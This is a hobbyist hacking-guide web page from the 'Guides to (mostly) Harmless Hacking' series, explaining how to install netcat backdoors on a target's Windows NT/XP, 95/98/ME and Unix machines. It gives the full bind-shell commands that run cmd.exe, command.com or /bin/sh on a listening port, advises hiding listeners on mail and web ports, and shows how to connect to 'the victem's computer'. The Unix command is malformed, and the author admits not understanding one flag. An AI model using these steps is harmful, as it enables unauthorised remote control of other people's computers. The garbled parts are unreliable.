What's New!

Chat with

How to Defend
Your Computer 

The Guides
to (mostly) 
Harmless Hacking

Happy Hacker 
Digests (old stuff) 

Hacker Links 


Meet the 
Happy Hacksters 

Help for 



It Sucks 
to Be Me!

How to Commit
Computer Crime (not)! 

What Is a 
Hacker, Anyhow? 

Have a 
Great Life! 

News from the 
Hacker War Front

GUIDE to (mostly) Harmless Hacking: "Backdoors With Netcat"

This guide covers Windows XP, 2000, NT, ME, 98, 95 and our favorite: Unix/Linux!

by Steven Welch with additions from Carolyn Meinel

Netcat, a networking security tool from the l0pht, can be used to
set up backdoors (ways of returning from a compromised system). The netcat backdoor discussed in this GTMHH is one based on Windows NT that is also in a GTMHH written by keydet in the MS Only Series. Thank you keydet!

Before I discuss the backdoor, let me tell you a few lines about

1) I'm not in any way close to being an Uberhacker. The thought of me being one just doesn't go with humanity for I've only been hacking for about a year.
2) I'm still in school, so don't expect me to always be able
to return your e-mails.
Table of Contents:
1. The Problem
2. How the Backdoor Works
3. Getting the Backdoor to Work on Windows 95/98/ME

1. The Problem

Here's what this whole guide is about: getting the backdoor to
work on more than just Windows NT/2000/XP.When I first saw the guide on breaking into NT, I hurried up and viewed it. I began reading and it said something like, "This also works with 2000 and XP!" I thought to myself, "Now that's not right! What about
Windows 95/98/ME and Unix!" So I began reading on on how the backdoor worked and saw how it worked in order to set off toward my goal of a multi-operating-system backdoor.

2. How the Backdoor Works - On Windows NT/2000/XP

For the backdoor, you'll need netcat for Windows (means you'll need a windows box, too) which you can get from @stake). Look for the network tools - that's where you'll find netcat. You should also know how to make batch files, which you can learn in the MS Only Series from keydet in the GTMHH.

Sublimely Suggested:

Know everything else there is to know in all of the GTMHH!

First, get the netcat executable file (nc.exe) onto the target's
c:\windows\system32 directory. Then make a batch file with the following command in it:

nc -L -d -p <backdoor port of choice> -t -e cmd.exe

Here's what that command does:
nc - tells Windows to run the nc.exe file with the following arguments:
-L Tells netcat to not close and wait for connections
-d Tells netcat not to open a Window when running
-p Specifies a port to listen for a connection on
-t Tells netcat to accept telnet connections
-e Tells what program to run once the port is connected to

Put the batch file in the c:\windows\system32 directory also and run it.

Once that batch file is run, you can telnet or use netcat in client mode to connect to it. Here's how to use netcat to connect to it:
In a DOS prompt, give the command

C:\WINDOWS\> nc -v <IP Address of victem> <port you chose>

Once you connected to that port on the victem's computer, you'll have a DOS prompt that you can give any command on the victem's computer.

The backdoor will close whenever the victem shuts down their
computer. To get it running again, just run the batch file.

3. Getting the Backdoor to Work on Windows 95/98/ME

After reading, I thought to myself, "Now why can't I get that to
work on 95/98/ME? Hmm... let's see here..." Then I thought about how the commands worked and came up with a solution.

First, put the nc.exe file in the c:\windows directory. Why?
Explain later. Put the batch file there, too, but change the batch file

nc -L -d -p <port of choice> -t -e command.com

There ya go - it'll work on 95/98/ME. Here's why:

First off, you don't need to put the files in the system32 directory because 95/98/ME doesn't use execute paths like NT does. If you wouldn't have put the files in System32 directory on NT, the program wouldn't have executed the batch file because it wouldn't have been in the file path - but you don't have to worry about that in 95/98/ME. The reason why we put the files in the c:\windows directory on 95/98/Me is because that's where the command.com file is - the MS-DOS Prompt file. (It's cmd.exe on NT/2000/XP.) That's why we ran command.com instead of cmd.exe.

4. Getting the Backdoor to Work on Unix/Linux

Ok, first off, get the unix version of netcat onto the target system. Now, simply execute the following command on the following system:

nc -nvv -l -p -e /bin/sh <port of choice>

For best results, put that command in a shell script. Also, a good idea is to run the command on more than one port to connect to, and to execute this command to ports like mail services (port 25) and web services (port 80).

How does this work? Let's examine:

-nvv I'm not exactly sure what this does. Further research is required...
-l stay open and listen
-p what port to listen to
-e /bin/sh spawns a shell. Or could use bash, tcsh, ksh etc. instead of sh for the shell of your choice.

So, let's see what we've learned overall:

Netcat is a usefull hackers tool that can set up backdoors. That says it all.

Thanks for reading!

Steven Lee Welch

With additions from .

Search the GTMHH

Why do we freely give out information that even the total beginner may use as a two-edged sword of cyberspace power? We do this "to turn over to mankind at large the greatest possible power to control the world and deal with it according to its lights and values." -- Robert J. Oppenheimer, head of the Manhattan Project, which created the world's first nuclear weapons.  

Carolyn's most
popular book,
in 4th edition now!
For advanced
hacker studies,
read Carolyn's
Google Groups
Subscribe to Happy Hacker
Visit this group

Return to the index of Guides to (mostly) Harmless Hacking!

© 2013 Happy Hacker All rights reserved.